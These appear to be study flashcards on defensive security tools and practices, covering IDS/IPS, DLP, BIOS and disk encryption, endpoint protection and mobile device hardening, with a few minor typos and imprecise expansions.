Security Applications and Devices Flashcards
Software Firewalls
Software application that protects a single computer from unwanted Internet traffic. Examples of these types of host-based firewalls are: Windows Firewall (Windows), PF and IPFW (OS X), and iptables (Linux). Many anti-malware suites also contain software firewalls
Intrusion Detection System (IDS)
A device or software application that monitors a system or network and analyzes the data passing through it in order to identify an incident or attack. Two types are a HIDS or Host-based IDS, and NIDS or Network based IDS.
NIDS can identify an attacker before he can perform a breach, while HIDS acts as a second layer of defense and take action at the endpoint level if the system is breached.
HIDS
Host-based IDS looks at particular host-based behaviors (at the endpoint level) including what apps are utilized, what files are accessed, and what information is stored in the kernel logs.
HIDS analyzes logged files for signs of malicious activity, and allows you to examine historical data in order to determine activity patterns which are useful particularly to detect activity from experienced hackers who often vary their methods of intrusion to be more unpredictable and therefor less easily traced.
NIDS
Network-based IDS examines the data flow between computers for unusual activity. Allows for a fast response as real-time data monitoring can trigger alerts.
Security Information and Even Management - SEIM
A subsection of computer security services that brings together both NIDS and HIDS solutions that provide real-time analysis of security alerts generated by applications and network hardware.
Signature-based Detection Method
A specific string of bytes triggers an alert.
Policy-based Detection Method
Relies on a specific declaration of the security policy (i.e. “No Telnet Authorized”)
Anomaly-based Detection Method
Analyzes the current traffic against an established baseline and trigger an alert if outside the statistical average.
True Positive Alert
Malicious activity is identified as an attack.
False Positive
Legitimate activity is identified as an attack.
True Negative
Legitimate activity is identified as legitimate traffic
False Negative Alert
Malicious activity is identified as legitimate traffic.
IDS vs. IPS
Intrusion Detection Systems can only alert and log suspicious activity whereas an Intrusion Protection System can also stop malicious activity from being executed.
Pop Up Blockers
Most web browsers have the ability to block Java Script created pop-ups.
Sometimes to allow a website to function, pop-ups need to be enabled.
Malicious actors could purchase ads through various networks.
Data Loss Prevention - DLP
Monitors the data of a system while in use, in transit, or at rest to detect attempts to steal the data.
DLP can be in the form of software or hardware solutions.
Endpoint DLP System
Software-based client that monitors the data in use on a computer and can stop a file transfer or alert an admin of the occurrence.
Network DLP System
Software or hardware-based solution that is installed on the perimeter of the network to detect data in transit.
Storage DLP System
Software installed on servers in the datacenter to inspect the data at rest.
Cloud DLP System
Cloud software as a service that protects data being stored in cloud services.
BIOS and UEFI
Firmware that provides the computer instructions for how to accept input and send output.
BIOS - Basic Input Output Settings
UEFI - Unified Extensible Firmware Interface
BIOS and UEFI are used to reference similar things.
Securing the BIOS
- Flash the BIOS.
- Use a BIOS password.
- Configure the BIOS boot order, removing any unneeded devices.
- Disable the external ports and devices.
- Enable the secure boot option.
Securing Removable Media Storage
Encrypt files on removable media.
Use technical limitations on computer systems and their use of USB and other removable media (e.g. disable USB ports).
Create administrative controls such as policies (e.g. company policy prohibiting copy/export of data to removable storage devices).
Securing Network Attached Storage (NAS) and Storage Area Network (SAN)
Use data encryption.
Use proper authentication.
Log NAS access.
Disk Encryption
Encryption adds security, but has lower performance.
Self-Encrypting Drive - Performs whole disk encryption by using embedded hardware.
Software encryption - Most commonly used type of encryption.
Trusted Platform Module (TPM) - Chip residing on the motherboard that contains an encryption key. If your motherboard doesn’t have TPM, you can use an external USB drive as a key.
Hardware Security Module (HSM) - Physical device that acts as a secure crypto-processor during the encryption process.
Endpoint Analysis
Anti-virus Host-based IDS/IPS (HIDS/HIPS) Endpoint Protection Platform (EPP) Endpoint Detection and Response (EDR) User and Entity Behavior Analytics (UEBA)
Endpoint Protection Platform
A software agent and monitoring system that performs multiple security tasks such as anti-virus, HIDS/HIPS, firewall, DLP, and file encryption.
Endpoint Detection and Response
A software agent that collects system data and logs for analysis by a monitoring system to provide early detection of threats
User and Entity Behavior Analytics
A system that can provide automated identification of suspicious activity by user accounts and computer hosts.
UEBA solutions are heavily dependent on advance computing techniques like AI and machine learning.
Many companies are now marketing Advanced Threat Protection (ATP), Advanced Endpoint Protection (AEP), and NextGen AV (NGAV) which is a hybrid of EPP, EDR, and UEBA.
Securing Wireless Devices
WiFi Protected Access 2 (WPA2) is the highest level of wireless security.
AES - Advanced Encryptions Standard
Bluetooth pairing creates a shared link key to encrypt the connection.
Mobile Malware
Always update your phone’s operating system.
Only install apps from the official App Store or Play Store.
Do not jailbreak/root device.
Only load official store apps.
SIM Cloning and ID Theft
SIM = Subscriber Identity Module
Cloning allows two phone to utilize the same service and allows attacker to gain access to the phone’s data.
SIM v1 cards are easy to clone. SIM v2 is much harder.
Be careful where you post phone numbers.
Bluetooth Attacks
Bluejacking - Sending of unsolicited message to Bluetooth enabled devices. Sends information to a device.
Bluesnarfing - Unauthorized access of information from a wireless device over a Bluetooth connection. Takes information from a device.
Mobile Device Theft
Always ensure your device is backed up.
Don’t try to recover your device alone if it is stolen.
Remote Lock - Requires PIN or password before someone can use the device.
Remote Wipe - Remotely erases the contents of the device to ensure the information is not recoverable.
Mobile App Security
Only install apps from office app stores.
Use TLS for email apps.
Employ an MDM solution.
Turn location services off to ensure privacy.
Geotagging should be considered when developing organization security policies.
Bring Your Own Device
BYOD introduces a lot of security issues to consider.
Use of Storage Segmentation is advised to create a clear separation between personal and company data on a single device.
Using a MDM solution can prevent certain apps from being installed on the device.
Hardening Mobile Devices
Update your device OS to the latest version.
Install Antivirus.
Train users on proper security and use of the device.
Only install apps from the official app stores.
Do not root or jailbreak your devices.
Only use v2 SIM cards with your devices.
Turn off all unnecessary features.
Turn on encryption for voice and data.
Use strong passwords or biometrics.
Don’t allow BYOD.
Ensure your organization has a good security policy for mobile devices.
Hardening
The act of configuring an operating system securely by updating it, creating rules and policies to govern it, and removing unnecessary applications and services.
Mitigate risk by minimizing vulnerabilities to reduce exposure to threats.